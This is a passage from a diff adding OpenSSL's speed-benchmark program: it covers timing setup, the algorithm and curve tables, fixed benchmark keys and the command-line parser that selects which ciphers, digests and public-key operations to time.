+#  if defined(OPENSSL_SYS_VMS) || defined(OPENSSL_SYS_WINDOWS) || defined(OPENSSL_SYS_MACINTOSH_CLASSIC) || defined(OPENSSL_SYS_OS2) || defined(OPENSSL_SYS_NETWARE)
+#   define HAVE_FORK 0
+#  else
+#   define HAVE_FORK 1
+#  endif
+# endif
+
+# if HAVE_FORK
+#  undef NO_FORK
+# else
+#  define NO_FORK
+# endif
+
+# undef BUFSIZE
+# define BUFSIZE ((long)1024*8+1)
+static volatile int run = 0;
+
+static int mr = 0;
+static int usertime = 1;
+
+static double Time_F(int s);
+static void print_message(const char *s, long num, int length);
+static void pkey_print_message(const char *str, const char *str2,
+                               long num, int bits, int sec);
+static void print_result(int alg, int run_no, int count, double time_used);
+# ifndef NO_FORK
+static int do_multi(int multi);
+# endif
+
+# define ALGOR_NUM       30
+# define SIZE_NUM        5
+# define RSA_NUM         4
+# define DSA_NUM         3
+
+# define EC_NUM       16
+# define MAX_ECDH_SIZE 256
+
+static const char *names[ALGOR_NUM] = {
+    "md2", "mdc2", "md4", "md5", "hmac(md5)", "sha1", "rmd160", "rc4",
+    "des cbc", "des ede3", "idea cbc", "seed cbc",
+    "rc2 cbc", "rc5-32/12 cbc", "blowfish cbc", "cast cbc",
+    "aes-128 cbc", "aes-192 cbc", "aes-256 cbc",
+    "camellia-128 cbc", "camellia-192 cbc", "camellia-256 cbc",
+    "evp", "sha256", "sha512", "whirlpool",
+    "aes-128 ige", "aes-192 ige", "aes-256 ige", "ghash"
+};
+
+static double results[ALGOR_NUM][SIZE_NUM];
+static int lengths[SIZE_NUM] = { 16, 64, 256, 1024, 8 * 1024 };
+
+# ifndef OPENSSL_NO_RSA
+static double rsa_results[RSA_NUM][2];
+# endif
+# ifndef OPENSSL_NO_DSA
+static double dsa_results[DSA_NUM][2];
+# endif
+# ifndef OPENSSL_NO_ECDSA
+static double ecdsa_results[EC_NUM][2];
+# endif
+# ifndef OPENSSL_NO_ECDH
+static double ecdh_results[EC_NUM][1];
+# endif
+
+# if defined(OPENSSL_NO_DSA) && !(defined(OPENSSL_NO_ECDSA) && defined(OPENSSL_NO_ECDH))
+static const char rnd_seed[] =
+    "string to make the random number generator think it has entropy";
+static int rnd_fake = 0;
+# endif
+
+# ifdef SIGALRM
+#  if defined(__STDC__) || defined(sgi) || defined(_AIX)
+#   define SIGRETTYPE void
+#  else
+#   define SIGRETTYPE int
+#  endif
+
+static SIGRETTYPE sig_done(int sig);
+static SIGRETTYPE sig_done(int sig)
+{
+    signal(SIGALRM, sig_done);
+    run = 0;
+#  ifdef LINT
+    sig = sig;
+#  endif
+}
+# endif
+
+# define START   0
+# define STOP    1
+
+# if defined(_WIN32)
+
+#  if !defined(SIGALRM)
+#   define SIGALRM
+#  endif
+static unsigned int lapse, schlock;
+static void alarm_win32(unsigned int secs)
+{
+    lapse = secs * 1000;
+}
+
+#  define alarm alarm_win32
+
+static DWORD WINAPI sleepy(VOID * arg)
+{
+    schlock = 1;
+    Sleep(lapse);
+    run = 0;
+    return 0;
+}
+
+static double Time_F(int s)
+{
+    if (s == START) {
+        HANDLE thr;
+        schlock = 0;
+        thr = CreateThread(NULL, 4096, sleepy, NULL, 0, NULL);
+        if (thr == NULL) {
+            DWORD ret = GetLastError();
+            BIO_printf(bio_err, "unable to CreateThread (%d)", ret);
+            ExitProcess(ret);
+        }
+        CloseHandle(thr);       /* detach the thread */
+        while (!schlock)
+            Sleep(0);           /* scheduler spinlock */
+    }
+
+    return app_tminterval(s, usertime);
+}
+# else
+
+static double Time_F(int s)
+{
+    return app_tminterval(s, usertime);
+}
+# endif
+
+# ifndef OPENSSL_NO_ECDH
+static const int KDF1_SHA1_len = 20;
+static void *KDF1_SHA1(const void *in, size_t inlen, void *out,
+                       size_t *outlen)
+{
+#  ifndef OPENSSL_NO_SHA
+    if (*outlen < SHA_DIGEST_LENGTH)
+        return NULL;
+    else
+        *outlen = SHA_DIGEST_LENGTH;
+    return SHA1(in, inlen, out);
+#  else
+    return NULL;
+#  endif                        /* OPENSSL_NO_SHA */
+}
+# endif                         /* OPENSSL_NO_ECDH */
+
+static void multiblock_speed(const EVP_CIPHER *evp_cipher);
+
+int MAIN(int, char **);
+
+int MAIN(int argc, char **argv)
+{
+    unsigned char *buf = NULL, *buf2 = NULL;
+    int mret = 1;
+    long count = 0, save_count = 0;
+    int i, j, k;
+# if !defined(OPENSSL_NO_RSA) || !defined(OPENSSL_NO_DSA)
+    long rsa_count;
+# endif
+# ifndef OPENSSL_NO_RSA
+    unsigned rsa_num;
+# endif
+    unsigned char md[EVP_MAX_MD_SIZE];
+# ifndef OPENSSL_NO_MD2
+    unsigned char md2[MD2_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_MDC2
+    unsigned char mdc2[MDC2_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_MD4
+    unsigned char md4[MD4_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_MD5
+    unsigned char md5[MD5_DIGEST_LENGTH];
+    unsigned char hmac[MD5_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_SHA
+    unsigned char sha[SHA_DIGEST_LENGTH];
+#  ifndef OPENSSL_NO_SHA256
+    unsigned char sha256[SHA256_DIGEST_LENGTH];
+#  endif
+#  ifndef OPENSSL_NO_SHA512
+    unsigned char sha512[SHA512_DIGEST_LENGTH];
+#  endif
+# endif
+# ifndef OPENSSL_NO_WHIRLPOOL
+    unsigned char whirlpool[WHIRLPOOL_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_RIPEMD
+    unsigned char rmd160[RIPEMD160_DIGEST_LENGTH];
+# endif
+# ifndef OPENSSL_NO_RC4
+    RC4_KEY rc4_ks;
+# endif
+# ifndef OPENSSL_NO_RC5
+    RC5_32_KEY rc5_ks;
+# endif
+# ifndef OPENSSL_NO_RC2
+    RC2_KEY rc2_ks;
+# endif
+# ifndef OPENSSL_NO_IDEA
+    IDEA_KEY_SCHEDULE idea_ks;
+# endif
+# ifndef OPENSSL_NO_SEED
+    SEED_KEY_SCHEDULE seed_ks;
+# endif
+# ifndef OPENSSL_NO_BF
+    BF_KEY bf_ks;
+# endif
+# ifndef OPENSSL_NO_CAST
+    CAST_KEY cast_ks;
+# endif
+    static const unsigned char key16[16] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12
+    };
+# ifndef OPENSSL_NO_AES
+    static const unsigned char key24[24] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12,
+        0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34
+    };
+    static const unsigned char key32[32] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12,
+        0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34,
+        0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34, 0x56
+    };
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+    static const unsigned char ckey24[24] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12,
+        0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34
+    };
+    static const unsigned char ckey32[32] = {
+        0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0,
+        0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12,
+        0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34,
+        0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34, 0x56
+    };
+# endif
+# ifndef OPENSSL_NO_AES
+#  define MAX_BLOCK_SIZE 128
+# else
+#  define MAX_BLOCK_SIZE 64
+# endif
+    unsigned char DES_iv[8];
+    unsigned char iv[2 * MAX_BLOCK_SIZE / 8];
+# ifndef OPENSSL_NO_DES
+    static DES_cblock key =
+        { 0x12, 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0 };
+    static DES_cblock key2 =
+        { 0x34, 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12 };
+    static DES_cblock key3 =
+        { 0x56, 0x78, 0x9a, 0xbc, 0xde, 0xf0, 0x12, 0x34 };
+    DES_key_schedule sch;
+    DES_key_schedule sch2;
+    DES_key_schedule sch3;
+# endif
+# ifndef OPENSSL_NO_AES
+    AES_KEY aes_ks1, aes_ks2, aes_ks3;
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+    CAMELLIA_KEY camellia_ks1, camellia_ks2, camellia_ks3;
+# endif
+# define D_MD2           0
+# define D_MDC2          1
+# define D_MD4           2
+# define D_MD5           3
+# define D_HMAC          4
+# define D_SHA1          5
+# define D_RMD160        6
+# define D_RC4           7
+# define D_CBC_DES       8
+# define D_EDE3_DES      9
+# define D_CBC_IDEA      10
+# define D_CBC_SEED      11
+# define D_CBC_RC2       12
+# define D_CBC_RC5       13
+# define D_CBC_BF        14
+# define D_CBC_CAST      15
+# define D_CBC_128_AES   16
+# define D_CBC_192_AES   17
+# define D_CBC_256_AES   18
+# define D_CBC_128_CML   19
+# define D_CBC_192_CML   20
+# define D_CBC_256_CML   21
+# define D_EVP           22
+# define D_SHA256        23
+# define D_SHA512        24
+# define D_WHIRLPOOL     25
+# define D_IGE_128_AES   26
+# define D_IGE_192_AES   27
+# define D_IGE_256_AES   28
+# define D_GHASH         29
+    double d = 0.0;
+    long c[ALGOR_NUM][SIZE_NUM];
+# define R_DSA_512       0
+# define R_DSA_1024      1
+# define R_DSA_2048      2
+# define R_RSA_512       0
+# define R_RSA_1024      1
+# define R_RSA_2048      2
+# define R_RSA_4096      3
+
+# define R_EC_P160    0
+# define R_EC_P192    1
+# define R_EC_P224    2
+# define R_EC_P256    3
+# define R_EC_P384    4
+# define R_EC_P521    5
+# define R_EC_K163    6
+# define R_EC_K233    7
+# define R_EC_K283    8
+# define R_EC_K409    9
+# define R_EC_K571    10
+# define R_EC_B163    11
+# define R_EC_B233    12
+# define R_EC_B283    13
+# define R_EC_B409    14
+# define R_EC_B571    15
+
+# ifndef OPENSSL_NO_RSA
+    RSA *rsa_key[RSA_NUM];
+    long rsa_c[RSA_NUM][2];
+    static unsigned int rsa_bits[RSA_NUM] = {
+        512, 1024, 2048, 4096
+    };
+    static unsigned char *rsa_data[RSA_NUM] = {
+        test512, test1024, test2048, test4096
+    };
+    static int rsa_data_length[RSA_NUM] = {
+        sizeof(test512), sizeof(test1024),
+        sizeof(test2048), sizeof(test4096)
+    };
+# endif
+# ifndef OPENSSL_NO_DSA
+    DSA *dsa_key[DSA_NUM];
+    long dsa_c[DSA_NUM][2];
+    static unsigned int dsa_bits[DSA_NUM] = { 512, 1024, 2048 };
+# endif
+# ifndef OPENSSL_NO_EC
+    /*
+     * We only test over the following curves as they are representative, To
+     * add tests over more curves, simply add the curve NID and curve name to
+     * the following arrays and increase the EC_NUM value accordingly.
+     */
+    static unsigned int test_curves[EC_NUM] = {
+        /* Prime Curves */
+        NID_secp160r1,
+        NID_X9_62_prime192v1,
+        NID_secp224r1,
+        NID_X9_62_prime256v1,
+        NID_secp384r1,
+        NID_secp521r1,
+        /* Binary Curves */
+        NID_sect163k1,
+        NID_sect233k1,
+        NID_sect283k1,
+        NID_sect409k1,
+        NID_sect571k1,
+        NID_sect163r2,
+        NID_sect233r1,
+        NID_sect283r1,
+        NID_sect409r1,
+        NID_sect571r1
+    };
+    static const char *test_curves_names[EC_NUM] = {
+        /* Prime Curves */
+        "secp160r1",
+        "nistp192",
+        "nistp224",
+        "nistp256",
+        "nistp384",
+        "nistp521",
+        /* Binary Curves */
+        "nistk163",
+        "nistk233",
+        "nistk283",
+        "nistk409",
+        "nistk571",
+        "nistb163",
+        "nistb233",
+        "nistb283",
+        "nistb409",
+        "nistb571"
+    };
+    static int test_curves_bits[EC_NUM] = {
+        160, 192, 224, 256, 384, 521,
+        163, 233, 283, 409, 571,
+        163, 233, 283, 409, 571
+    };
+
+# endif
+
+# ifndef OPENSSL_NO_ECDSA
+    unsigned char ecdsasig[256];
+    unsigned int ecdsasiglen;
+    EC_KEY *ecdsa[EC_NUM];
+    long ecdsa_c[EC_NUM][2];
+# endif
+
+# ifndef OPENSSL_NO_ECDH
+    EC_KEY *ecdh_a[EC_NUM], *ecdh_b[EC_NUM];
+    unsigned char secret_a[MAX_ECDH_SIZE], secret_b[MAX_ECDH_SIZE];
+    int secret_size_a, secret_size_b;
+    int ecdh_checks = 0;
+    int secret_idx = 0;
+    long ecdh_c[EC_NUM][2];
+# endif
+
+    int rsa_doit[RSA_NUM];
+    int dsa_doit[DSA_NUM];
+# ifndef OPENSSL_NO_ECDSA
+    int ecdsa_doit[EC_NUM];
+# endif
+# ifndef OPENSSL_NO_ECDH
+    int ecdh_doit[EC_NUM];
+# endif
+    int doit[ALGOR_NUM];
+    int pr_header = 0;
+    const EVP_CIPHER *evp_cipher = NULL;
+    const EVP_MD *evp_md = NULL;
+    int decrypt = 0;
+# ifndef NO_FORK
+    int multi = 0;
+# endif
+    int multiblock = 0;
+
+# ifndef TIMES
+    usertime = -1;
+# endif
+
+    apps_startup();
+    memset(results, 0, sizeof(results));
+# ifndef OPENSSL_NO_DSA
+    memset(dsa_key, 0, sizeof(dsa_key));
+# endif
+# ifndef OPENSSL_NO_ECDSA
+    for (i = 0; i < EC_NUM; i++)
+        ecdsa[i] = NULL;
+# endif
+# ifndef OPENSSL_NO_ECDH
+    for (i = 0; i < EC_NUM; i++) {
+        ecdh_a[i] = NULL;
+        ecdh_b[i] = NULL;
+    }
+# endif
+
+    if (bio_err == NULL)
+        if ((bio_err = BIO_new(BIO_s_file())) != NULL)
+            BIO_set_fp(bio_err, stderr, BIO_NOCLOSE | BIO_FP_TEXT);
+
+    if (!load_config(bio_err, NULL))
+        goto end;
+
+# ifndef OPENSSL_NO_RSA
+    memset(rsa_key, 0, sizeof(rsa_key));
+    for (i = 0; i < RSA_NUM; i++)
+        rsa_key[i] = NULL;
+# endif
+
+    if ((buf = (unsigned char *)OPENSSL_malloc((int)BUFSIZE)) == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        goto end;
+    }
+    if ((buf2 = (unsigned char *)OPENSSL_malloc((int)BUFSIZE)) == NULL) {
+        BIO_printf(bio_err, "out of memory\n");
+        goto end;
+    }
+
+    memset(c, 0, sizeof(c));
+    memset(DES_iv, 0, sizeof(DES_iv));
+    memset(iv, 0, sizeof(iv));
+
+    for (i = 0; i < ALGOR_NUM; i++)
+        doit[i] = 0;
+    for (i = 0; i < RSA_NUM; i++)
+        rsa_doit[i] = 0;
+    for (i = 0; i < DSA_NUM; i++)
+        dsa_doit[i] = 0;
+# ifndef OPENSSL_NO_ECDSA
+    for (i = 0; i < EC_NUM; i++)
+        ecdsa_doit[i] = 0;
+# endif
+# ifndef OPENSSL_NO_ECDH
+    for (i = 0; i < EC_NUM; i++)
+        ecdh_doit[i] = 0;
+# endif
+
+    j = 0;
+    argc--;
+    argv++;
+    while (argc) {
+        if ((argc > 0) && (strcmp(*argv, "-elapsed") == 0)) {
+            usertime = 0;
+            j--;                /* Otherwise, -elapsed gets confused with an
+                                 * algorithm. */
+        } else if ((argc > 0) && (strcmp(*argv, "-evp") == 0)) {
+            argc--;
+            argv++;
+            if (argc == 0) {
+                BIO_printf(bio_err, "no EVP given\n");
+                goto end;
+            }
+            evp_cipher = EVP_get_cipherbyname(*argv);
+            if (!evp_cipher) {
+                evp_md = EVP_get_digestbyname(*argv);
+            }
+            if (!evp_cipher && !evp_md) {
+                BIO_printf(bio_err, "%s is an unknown cipher or digest\n",
+                           *argv);
+                goto end;
+            }
+            doit[D_EVP] = 1;
+        } else if (argc > 0 && !strcmp(*argv, "-decrypt")) {
+            decrypt = 1;
+            j--;                /* Otherwise, -elapsed gets confused with an
+                                 * algorithm. */
+        }
+# ifndef OPENSSL_NO_ENGINE
+        else if ((argc > 0) && (strcmp(*argv, "-engine") == 0)) {
+            argc--;
+            argv++;
+            if (argc == 0) {
+                BIO_printf(bio_err, "no engine given\n");
+                goto end;
+            }
+            setup_engine(bio_err, *argv, 0);
+            /*
+             * j will be increased again further down.  We just don't want
+             * speed to confuse an engine with an algorithm, especially when
+             * none is given (which means all of them should be run)
+             */
+            j--;
+        }
+# endif
+# ifndef NO_FORK
+        else if ((argc > 0) && (strcmp(*argv, "-multi") == 0)) {
+            argc--;
+            argv++;
+            if (argc == 0) {
+                BIO_printf(bio_err, "no multi count given\n");
+                goto end;
+            }
+            multi = atoi(argv[0]);
+            if (multi <= 0) {
+                BIO_printf(bio_err, "bad multi count\n");
+                goto end;
+            }
+            j--;                /* Otherwise, -mr gets confused with an
+                                 * algorithm. */
+        }
+# endif
+        else if (argc > 0 && !strcmp(*argv, "-mr")) {
+            mr = 1;
+            j--;                /* Otherwise, -mr gets confused with an
+                                 * algorithm. */
+        } else if (argc > 0 && !strcmp(*argv, "-mb")) {
+            multiblock = 1;
+            j--;
+        } else
+# ifndef OPENSSL_NO_MD2
+        if (strcmp(*argv, "md2") == 0)
+            doit[D_MD2] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_MDC2
+        if (strcmp(*argv, "mdc2") == 0)
+            doit[D_MDC2] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_MD4
+        if (strcmp(*argv, "md4") == 0)
+            doit[D_MD4] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_MD5
+        if (strcmp(*argv, "md5") == 0)
+            doit[D_MD5] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_MD5
+        if (strcmp(*argv, "hmac") == 0)
+            doit[D_HMAC] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_SHA
+        if (strcmp(*argv, "sha1") == 0)
+            doit[D_SHA1] = 1;
+        else if (strcmp(*argv, "sha") == 0)
+            doit[D_SHA1] = 1, doit[D_SHA256] = 1, doit[D_SHA512] = 1;
+        else
+#  ifndef OPENSSL_NO_SHA256
+        if (strcmp(*argv, "sha256") == 0)
+            doit[D_SHA256] = 1;
+        else
+#  endif
+#  ifndef OPENSSL_NO_SHA512
+        if (strcmp(*argv, "sha512") == 0)
+            doit[D_SHA512] = 1;
+        else
+#  endif
+# endif
+# ifndef OPENSSL_NO_WHIRLPOOL
+        if (strcmp(*argv, "whirlpool") == 0)
+            doit[D_WHIRLPOOL] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_RIPEMD
+        if (strcmp(*argv, "ripemd") == 0)
+            doit[D_RMD160] = 1;
+        else if (strcmp(*argv, "rmd160") == 0)
+            doit[D_RMD160] = 1;
+        else if (strcmp(*argv, "ripemd160") == 0)
+            doit[D_RMD160] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_RC4
+        if (strcmp(*argv, "rc4") == 0)
+            doit[D_RC4] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_DES
+        if (strcmp(*argv, "des-cbc") == 0)
+            doit[D_CBC_DES] = 1;
+        else if (strcmp(*argv, "des-ede3") == 0)
+            doit[D_EDE3_DES] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_AES
+        if (strcmp(*argv, "aes-128-cbc") == 0)
+            doit[D_CBC_128_AES] = 1;
+        else if (strcmp(*argv, "aes-192-cbc") == 0)
+            doit[D_CBC_192_AES] = 1;
+        else if (strcmp(*argv, "aes-256-cbc") == 0)
+            doit[D_CBC_256_AES] = 1;
+        else if (strcmp(*argv, "aes-128-ige") == 0)
+            doit[D_IGE_128_AES] = 1;
+        else if (strcmp(*argv, "aes-192-ige") == 0)
+            doit[D_IGE_192_AES] = 1;
+        else if (strcmp(*argv, "aes-256-ige") == 0)
+            doit[D_IGE_256_AES] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        if (strcmp(*argv, "camellia-128-cbc") == 0)
+            doit[D_CBC_128_CML] = 1;
+        else if (strcmp(*argv, "camellia-192-cbc") == 0)
+            doit[D_CBC_192_CML] = 1;
+        else if (strcmp(*argv, "camellia-256-cbc") == 0)
+            doit[D_CBC_256_CML] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_RSA
+#  if 0                         /* was: #ifdef RSAref */
+        if (strcmp(*argv, "rsaref") == 0) {
+            RSA_set_default_openssl_method(RSA_PKCS1_RSAref());
+            j--;
+        } else
+#  endif
+#  ifndef RSA_NULL
+        if (strcmp(*argv, "openssl") == 0) {
+            RSA_set_default_method(RSA_PKCS1_SSLeay());
+            j--;
+        } else
+#  endif
+# endif                         /* !OPENSSL_NO_RSA */
+        if (strcmp(*argv, "dsa512") == 0)
+            dsa_doit[R_DSA_512] = 2;
+        else if (strcmp(*argv, "dsa1024") == 0)
+            dsa_doit[R_DSA_1024] = 2;
+        else if (strcmp(*argv, "dsa2048") == 0)
+            dsa_doit[R_DSA_2048] = 2;
+        else if (strcmp(*argv, "rsa512") == 0)
+            rsa_doit[R_RSA_512] = 2;
+        else if (strcmp(*argv, "rsa1024") == 0)
+            rsa_doit[R_RSA_1024] = 2;
+        else if (strcmp(*argv, "rsa2048") == 0)
+            rsa_doit[R_RSA_2048] = 2;
+        else if (strcmp(*argv, "rsa4096") == 0)
+            rsa_doit[R_RSA_4096] = 2;
+        else
+# ifndef OPENSSL_NO_RC2
+        if (strcmp(*argv, "rc2-cbc") == 0)
+            doit[D_CBC_RC2] = 1;
+        else if (strcmp(*argv, "rc2") == 0)
+            doit[D_CBC_RC2] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_RC5
+        if (strcmp(*argv, "rc5-cbc") == 0)
+            doit[D_CBC_RC5] = 1;
+        else if (strcmp(*argv, "rc5") == 0)
+            doit[D_CBC_RC5] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_IDEA
+        if (strcmp(*argv, "idea-cbc") == 0)
+            doit[D_CBC_IDEA] = 1;
+        else if (strcmp(*argv, "idea") == 0)
+            doit[D_CBC_IDEA] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_SEED
+        if (strcmp(*argv, "seed-cbc") == 0)
+            doit[D_CBC_SEED] = 1;
+        else if (strcmp(*argv, "seed") == 0)
+            doit[D_CBC_SEED] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_BF
+        if (strcmp(*argv, "bf-cbc") == 0)
+            doit[D_CBC_BF] = 1;
+        else if (strcmp(*argv, "blowfish") == 0)
+            doit[D_CBC_BF] = 1;
+        else if (strcmp(*argv, "bf") == 0)
+            doit[D_CBC_BF] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_CAST
+        if (strcmp(*argv, "cast-cbc") == 0)
+            doit[D_CBC_CAST] = 1;
+        else if (strcmp(*argv, "cast") == 0)
+            doit[D_CBC_CAST] = 1;
+        else if (strcmp(*argv, "cast5") == 0)
+            doit[D_CBC_CAST] = 1;
+        else
+# endif
+# ifndef OPENSSL_NO_DES
+        if (strcmp(*argv, "des") == 0) {
+            doit[D_CBC_DES] = 1;
+            doit[D_EDE3_DES] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_AES
+        if (strcmp(*argv, "aes") == 0) {
+            doit[D_CBC_128_AES] = 1;
+            doit[D_CBC_192_AES] = 1;
+            doit[D_CBC_256_AES] = 1;
+        } else if (strcmp(*argv, "ghash") == 0) {
+            doit[D_GHASH] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_CAMELLIA
+        if (strcmp(*argv, "camellia") == 0) {
+            doit[D_CBC_128_CML] = 1;
+            doit[D_CBC_192_CML] = 1;
+            doit[D_CBC_256_CML] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_RSA
+        if (strcmp(*argv, "rsa") == 0) {
+            rsa_doit[R_RSA_512] = 1;
+            rsa_doit[R_RSA_1024] = 1;
+            rsa_doit[R_RSA_2048] = 1;
+            rsa_doit[R_RSA_4096] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_DSA
+        if (strcmp(*argv, "dsa") == 0) {
+            dsa_doit[R_DSA_512] = 1;
+            dsa_doit[R_DSA_1024] = 1;
+            dsa_doit[R_DSA_2048] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_ECDSA
+        if (strcmp(*argv, "ecdsap160") == 0)
+            ecdsa_doit[R_EC_P160] = 2;
+        else if (strcmp(*argv, "ecdsap192") == 0)
+            ecdsa_doit[R_EC_P192] = 2;
+        else if (strcmp(*argv, "ecdsap224") == 0)
+            ecdsa_doit[R_EC_P224] = 2;
+        else if (strcmp(*argv, "ecdsap256") == 0)
+            ecdsa_doit[R_EC_P256] = 2;
+        else if (strcmp(*argv, "ecdsap384") == 0)
+            ecdsa_doit[R_EC_P384] = 2;
+        else if (strcmp(*argv, "ecdsap521") == 0)
+            ecdsa_doit[R_EC_P521] = 2;
+        else if (strcmp(*argv, "ecdsak163") == 0)
+            ecdsa_doit[R_EC_K163] = 2;
+        else if (strcmp(*argv, "ecdsak233") == 0)
+            ecdsa_doit[R_EC_K233] = 2;
+        else if (strcmp(*argv, "ecdsak283") == 0)
+            ecdsa_doit[R_EC_K283] = 2;
+        else if (strcmp(*argv, "ecdsak409") == 0)
+            ecdsa_doit[R_EC_K409] = 2;
+        else if (strcmp(*argv, "ecdsak571") == 0)
+            ecdsa_doit[R_EC_K571] = 2;
+        else if (strcmp(*argv, "ecdsab163") == 0)
+            ecdsa_doit[R_EC_B163] = 2;
+        else if (strcmp(*argv, "ecdsab233") == 0)
+            ecdsa_doit[R_EC_B233] = 2;
+        else if (strcmp(*argv, "ecdsab283") == 0)
+            ecdsa_doit[R_EC_B283] = 2;
+        else if (strcmp(*argv, "ecdsab409") == 0)
+            ecdsa_doit[R_EC_B409] = 2;
+        else if (strcmp(*argv, "ecdsab571") == 0)
+            ecdsa_doit[R_EC_B571] = 2;
+        else if (strcmp(*argv, "ecdsa") == 0) {
+            for (i = 0; i < EC_NUM; i++)
+                ecdsa_doit[i] = 1;
+        } else
+# endif
+# ifndef OPENSSL_NO_ECDH
+        if (strcmp(*argv, "ecdhp160") == 0)
+            ecdh_doit[R_EC_P160] = 2;
+        else if (strcmp(*argv, "ecdhp192") == 0)
+            ecdh_doit[R_EC_P192] = 2;
+        else if (strcmp(*argv, "ecdhp224") == 0)
+            ecdh_doit[R_EC_P224] = 2;
+        else if (strcmp(*argv, "ecdhp256") == 0)
+            ecdh_doit[R_EC_P256] = 2;
+        else if (strcmp(*argv, "ecdhp384") == 0)
+            ecdh_doit[R_EC_P384] = 2;
+        else if (strcmp(*argv, "ecdhp521") == 0)
+            ecdh_doit[R_EC_P521] = 2;
+        else if (strcmp(*argv, "ecdhk163") == 0)
+            ecdh_doit[R_EC_K163] = 2;
+        else if (strcmp(*argv, "ecdhk233") == 0)
+            ecdh_doit[R_EC_K233] = 2;
+        else if (strcmp(*argv, "ecdhk283") == 0)
+            ecdh_doit[R_EC_K283] = 2;
+        else if (strcmp(*argv, "ecdhk409") == 0)
+            ecdh_doit[R_EC_K409] = 2;
+        else if (strcmp(*argv, "ecdhk571") == 0)
+            ecdh_doit[R_EC_K571] = 2;
+        else if (strcmp(*argv, "ecdhb163") == 0)
+            ecdh_doit[R_EC_B163] = 2;
+        else if (strcmp(*argv, "ecdhb233") == 0)
+            ecdh_doit[R_EC_B233] = 2;
+        else if (strcmp(*argv, "ecdhb283") == 0)
+            ecdh_doit[R_EC_B283] = 2;
+        else if (strcmp(*argv, "ecdhb409") == 0)
+            ecdh_doit[R_EC_B409] = 2;
+        else if (strcmp(*argv, "ecdhb571") == 0)
+            ecdh_doit[R_EC_B571] = 2;
+        else if (strcmp(*argv, "ecdh") == 0) {
+            for (i = 0; i < EC_NUM; i++)
+                ecdh_doit[i] = 1;
+        } else
+# endif
+        {
+            BIO_printf(bio_err, "Error: bad option or value\n");
+            BIO_printf(bio_err, "\n");
+            BIO_printf(bio_err, "Available values:\n");
+# ifndef OPENSSL_NO_MD2
+            BIO_printf(bio_err, "md2      ");
+# endif
+# ifndef OPENSSL_NO_MDC2
+            BIO_printf(bio_err, "mdc2     ");
+# endif
+# ifndef OPENSSL_NO_MD4
+            BIO_printf(bio_err, "md4      ");
+# endif
+# ifndef OPENSSL_NO_MD5
+            BIO_printf(bio_err, "md5      ");
+#  ifndef OPENSSL_NO_HMAC
+            BIO_printf(bio_err, "hmac     ");
+#  endif
+# endif
+# ifndef OPENSSL_NO_SHA1
+            BIO_printf(bio_err, "sha1     ");
+# endif
+# ifndef OPENSSL_NO_SHA256
+            BIO_printf(bio_err, "sha256   ");
+# endif
+# ifndef OPENSSL_NO_SHA512
+            BIO_printf(bio_err, "sha512   ");
+# endif
+# ifndef OPENSSL_NO_WHIRLPOOL
+            BIO_printf(bio_err, "whirlpool");
+# endif
+# ifndef OPENSSL_NO_RIPEMD160
+            BIO_printf(bio_err, "rmd160");
+# endif
+# if !defined(OPENSSL_NO_MD2) || !defined(OPENSSL_NO_MDC2) || \
+    !defined(OPENSSL_NO_MD4) || !defined(OPENSSL_NO_MD5) || \
+    !defined(OPENSSL_NO_SHA1) || !defined(OPENSSL_NO_RIPEMD160) || \
+    !defined(OPENSSL_NO_WHIRLPOOL)
+            BIO_printf(bio_err, "\n");
+# endif
+
+# ifndef OPENSSL_NO_IDEA
+            BIO_printf(bio_err, "idea-cbc ");
+# endif
+# ifndef OPENSSL_NO_SEED
+            BIO_printf(bio_err, "seed-cbc ");
+# endif
